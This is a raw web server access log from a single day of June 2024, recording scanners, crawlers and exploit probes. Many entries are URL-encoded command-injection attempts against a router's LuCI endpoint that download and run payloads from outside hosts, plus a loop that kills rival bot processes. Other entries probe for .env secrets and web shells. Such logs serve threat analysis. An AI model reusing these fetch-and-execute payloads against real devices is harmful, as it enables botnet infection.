92.249.48.197 - - [30/Jun/2024:03:28:15 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 80.82.77.202 - - [30/Jun/2024:03:36:42 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-" 80.66.83.49 - - [30/Jun/2024:03:39:58 +0200] "-" 408 - "-" "-" 185.191.127.212 - - [30/Jun/2024:03:40:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F93.123.72.16%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 80.66.83.49 - - [30/Jun/2024:03:40:18 +0200] "-" 408 - "-" "-" 80.66.83.49 - - [30/Jun/2024:03:40:18 +0200] "CONNECT 80.66.83.49:80 HTTP/1.1" 200 423 "-" "-" 94.156.68.162 - - [30/Jun/2024:03:51:03 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian" 94.156.68.162 - - [30/Jun/2024:03:54:08 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" 45.156.130.2 - - [30/Jun/2024:04:16:49 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.128.43 - - [30/Jun/2024:04:23:49 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 78.153.140.222 - - [30/Jun/2024:04:38:02 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.222 - - [30/Jun/2024:04:38:02 +0200] "\x16\x03\x01\x01H\x01" 400 383 "-" "-" 35.203.211.26 - - [30/Jun/2024:04:41:29 +0200] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 185.191.127.212 - - [30/Jun/2024:04:47:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F93.123.72.16%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 185.191.127.212 - - [30/Jun/2024:04:54:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F93.123.72.16%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - [30/Jun/2024:04:55:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - [30/Jun/2024:04:55:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.11.79 - - [30/Jun/2024:05:24:24 +0200] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 64.62.156.23 - - [30/Jun/2024:05:41:41 +0200] "\x16\x03\x01" 400 383 "-" "-" 47.128.115.50 - - [30/Jun/2024:05:41:57 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 157.230.241.242 - - [30/Jun/2024:05:42:23 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.9222.1261 Mobile Safari/537.36" 47.128.112.86 - - [30/Jun/2024:05:42:42 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 207.148.120.251 - - [30/Jun/2024:05:46:34 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.1638.1675 Mobile Safari/537.36" 141.98.83.197 - - [30/Jun/2024:05:57:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - [30/Jun/2024:05:57:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 80.82.77.202 - - [30/Jun/2024:06:05:48 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-" 80.66.76.134 - - [30/Jun/2024:06:11:06 +0200] "\x03" 400 383 "-" "-" 176.113.115.200 - - [30/Jun/2024:06:15:01 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 178.150.14.250 - - [30/Jun/2024:06:17:32 +0200] "GET /robots.txt HTTP/1.1" 404 362 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" 178.150.14.250 - - [30/Jun/2024:06:17:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" 151.237.55.226 - - [30/Jun/2024:06:20:20 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 78.153.140.179 - - [30/Jun/2024:06:23:27 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.179 - - [30/Jun/2024:06:23:27 +0200] "\x16\x03\x01" 400 383 "-" "-" 185.224.128.43 - - [30/Jun/2024:06:30:20 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 141.98.83.197 - - [30/Jun/2024:06:37:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - [30/Jun/2024:06:37:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 185.191.127.212 - - [30/Jun/2024:06:44:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F93.123.72.16%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 185.191.127.212 - - [30/Jun/2024:07:28:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F93.123.72.16%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 152.42.140.52 - - [30/Jun/2024:07:30:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 92.249.48.197 - - [30/Jun/2024:07:32:43 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 180.178.94.25 - - [30/Jun/2024:07:41:23 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 66.249.64.32 - - [30/Jun/2024:07:49:50 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.64.33 - - [30/Jun/2024:07:49:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.175 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 157.245.221.139 - - [30/Jun/2024:08:11:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 5.8.11.202 - - [30/Jun/2024:08:53:33 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36" 154.212.141.161 - - [30/Jun/2024:09:02:46 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 46.174.191.32 - - [30/Jun/2024:09:33:35 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" 141.98.83.197 - - [30/Jun/2024:09:37:53 +0200] "POST /cgi-bin/skk_set.cgi HTTP/1.1" 404 364 "-" "Go-http-client/1.1" 194.50.16.17 - - [30/Jun/2024:09:37:54 +0200] "GET /cgi-bin/luci/ HTTP/1.1" 404 358 "-" "-" 45.148.10.174 - - [30/Jun/2024:09:42:29 +0200] "POST /cmd,/simZysh/register_main/setCookie HTTP/1.1" 404 381 "-" "Go-http-client/1.1" 141.98.11.189 - - [30/Jun/2024:10:03:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 141.98.83.197 - - [30/Jun/2024:10:09:35 +0200] "POST /cgi-bin/skk_set.cgi HTTP/1.1" 404 364 "-" "Go-http-client/1.1" 94.156.68.34 - - [30/Jun/2024:10:12:34 +0200] "GET /inputs.php HTTP/1.1" 404 298 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.68.34 - - [30/Jun/2024:10:12:49 +0200] "GET /wp-includes/inputs.php HTTP/1.1" 404 306 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.68.34 - - [30/Jun/2024:10:13:07 +0200] "GET /wp-content/uploads/inputs.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.68.34 - - [30/Jun/2024:10:13:30 +0200] "GET /wp-content/plugins/inputs.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.68.34 - - [30/Jun/2024:10:14:06 +0200] "GET /wp-admin/inputs.php HTTP/1.1" 404 304 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.68.34 - - [30/Jun/2024:10:14:43 +0200] "GET /images/inputs.php HTTP/1.1" 404 302 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.68.34 - - [30/Jun/2024:10:14:55 +0200] "GET /.well-known/acme-challenge/inputs.php HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.68.34 - - [30/Jun/2024:10:15:26 +0200] "GET /wp-content/themes/inputs.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.68.34 - - [30/Jun/2024:10:15:43 +0200] "GET /wp-content/inputs.php HTTP/1.1" 404 305 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.68.34 - - [30/Jun/2024:10:16:06 +0200] "GET /cgi-bin/inputs.php HTTP/1.1" 404 303 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.148.10.174 - - [30/Jun/2024:10:22:43 +0200] "POST /cmd,/simZysh/register_main/setCookie HTTP/1.1" 404 381 "-" "Go-http-client/1.1" 147.185.132.72 - - [30/Jun/2024:10:25:39 +0200] "\x16\x03\x01" 400 383 "-" "-" 147.185.132.72 - - [30/Jun/2024:10:25:40 +0200] "\x16\x03\x01" 400 383 "-" "-" 141.98.83.197 - - [30/Jun/2024:10:46:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - [30/Jun/2024:10:46:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 194.50.16.17 - - [30/Jun/2024:10:57:35 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/605.1.15" 185.224.128.43 - - [30/Jun/2024:11:17:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 83.76.34.221 - - [30/Jun/2024:11:22:44 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 45.156.130.4 - - [30/Jun/2024:11:31:31 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.130.4 - - [30/Jun/2024:11:31:33 +0200] "GET /wp-content/plugins/wp-central/readme.txt HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 147.185.132.81 - - [30/Jun/2024:11:41:02 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 84.54.51.43 - - [30/Jun/2024:11:58:17 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 94.156.68.162 - - [30/Jun/2024:13:26:12 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-T820) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Safari/537.36" 141.98.83.197 - - [30/Jun/2024:13:31:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - [30/Jun/2024:13:31:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 94.156.68.162 - - [30/Jun/2024:13:31:04 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)" 45.156.130.8 - - [30/Jun/2024:13:32:08 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 85.239.33.196 - - [30/Jun/2024:13:57:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15" 85.239.33.196 - - [30/Jun/2024:13:58:46 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" 5.8.11.202 - - [30/Jun/2024:14:08:39 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-" 65.49.20.66 - - [30/Jun/2024:14:24:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36" 65.49.20.66 - - [30/Jun/2024:14:26:05 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" 65.49.20.66 - - [30/Jun/2024:14:26:34 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36" 92.249.48.197 - - [30/Jun/2024:14:33:04 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 94.156.68.162 - - [30/Jun/2024:14:57:55 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 94.156.68.162 - - [30/Jun/2024:15:02:26 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Linux; Android 8.1.0; Redmi Y2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36" 45.148.10.174 - - [30/Jun/2024:15:24:46 +0200] "POST /cmd,/simZysh/register_main/setCookie HTTP/1.1" 404 381 "-" "Go-http-client/1.1" 195.22.251.135 - - [30/Jun/2024:15:54:29 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 45.148.10.174 - - [30/Jun/2024:16:02:25 +0200] "POST /cmd,/simZysh/register_main/setCookie HTTP/1.1" 404 381 "-" "Go-http-client/1.1" 185.224.128.43 - - [30/Jun/2024:16:21:59 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 195.191.219.130 - - [30/Jun/2024:16:46:08 +0200] "GET /robots.txt HTTP/1.1" 404 375 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" 195.191.219.130 - - [30/Jun/2024:16:46:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" 141.98.83.197 - - [30/Jun/2024:16:48:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - [30/Jun/2024:16:48:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - [30/Jun/2024:16:59:25 +0200] "POST /cgi-bin/skk_set.cgi HTTP/1.1" 404 364 "-" "Go-http-client/1.1" 80.82.77.202 - - [30/Jun/2024:17:08:01 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 9; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" 141.98.83.197 - - [30/Jun/2024:17:23:32 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - [30/Jun/2024:17:23:32 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 45.148.10.174 - - [30/Jun/2024:17:26:04 +0200] "POST /cmd,/simZysh/register_main/setCookie HTTP/1.1" 404 381 "-" "Go-http-client/1.1" 47.128.115.125 - - [30/Jun/2024:17:45:39 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 45.32.106.18 - - [30/Jun/2024:17:47:03 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2912.1114 Mobile Safari/537.36" 47.128.27.209 - - [30/Jun/2024:17:47:23 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 139.180.158.163 - - [30/Jun/2024:17:47:44 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.5623.1679 Mobile Safari/537.36" 158.69.23.79 - - [30/Jun/2024:18:14:25 +0200] "GET /wso.php HTTP/1.1" 404 296 "-" "Linux Mozilla" 158.69.23.79 - - [30/Jun/2024:18:14:26 +0200] "GET /wp-admin/wso.php HTTP/1.1" 404 302 "-" "Linux Mozilla" 141.98.11.79 - - [30/Jun/2024:18:32:28 +0200] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 141.98.83.197 - - [30/Jun/2024:18:46:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.83.197 - - 